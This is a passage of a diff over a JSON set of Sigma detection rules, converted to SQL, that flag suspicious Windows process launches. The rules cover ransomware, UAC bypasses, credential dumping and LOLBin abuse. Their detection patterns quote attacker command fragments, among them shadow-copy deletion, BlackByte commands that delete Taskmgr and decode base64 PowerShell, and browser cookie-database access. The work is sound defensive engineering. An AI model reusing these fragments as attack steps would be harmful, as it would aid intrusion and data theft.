folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.002", - "attack.t1003.003" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_shadow_copies_creation.yml" + "filename": "proc_creation_win_schtasks_parent.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", - "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "title": "Suspicious RazerInstaller Explorer Subprocess", 
+ "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Unknown" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": "e0552b19-5a83-4222-b141-b36184bb8d79", "status": "test", - "description": 
"Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with 
command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR 
CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Potential Encoded PowerShell Patterns In CommandLine", - "id": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", - "status": "test", - "description": "Detects specific combinations of encoding methods in PowerShell via the commandline", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "title": "New Generic Credentials Added Via Cmdkey.EXE", + "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", + "status": "experimental", + "description": "Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface.", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate usage for administration purposes" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (((CommandLine LIKE '%ToInt%' ESCAPE '\\' OR CommandLine LIKE '%ToDecimal%' ESCAPE '\\' OR CommandLine LIKE '%ToByte%' ESCAPE '\\' OR CommandLine LIKE '%ToUint%' ESCAPE '\\' OR CommandLine LIKE '%ToSingle%' ESCAPE '\\' OR CommandLine LIKE '%ToSByte%' ESCAPE '\\') AND (CommandLine LIKE '%ToChar%' ESCAPE '\\' OR CommandLine LIKE '%ToString%' ESCAPE '\\' OR CommandLine LIKE '%String%' ESCAPE '\\')) OR ((CommandLine 
LIKE '%char%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\') OR (CommandLine LIKE '%split%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_encoding_patterns.yml" + "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", - "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "title": "PUA - NirCmd Execution", + "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "status": "experimental", + "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Legitimate use by administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 
'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_pua_nircmd.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", + "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", + "author": "TropChaud", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND (OriginalFileName = 'RUNDLL32.EXE' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", - "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", - "author": "Florian Roth (Nextron Systems)", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", - "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", - "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1021.002", 
- "attack.t1218.011" - ], + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", + "status": "test", + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - 
"Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", - "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 
'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Lolbin Unregmp2.exe Use As Proxy", - "id": "727454c0-d851-48b0-8b89-385611ab0704", - "status": "experimental", - "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", - "author": "frack113", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. 
This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_unregmp2.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Renamed ProcDump Execution", - "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "title": "Suspicious RASdial Activity", + "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", "status": "test", - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious process related to rasdial.exe", + "author": "juju4", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma 
%' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%rasdial.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_rasdial_execution.yml" }, { - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", - "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WMI Persistence - Script Event Consumer", + "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "status": "test", + "description": "Detects WMI script event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" ], - 
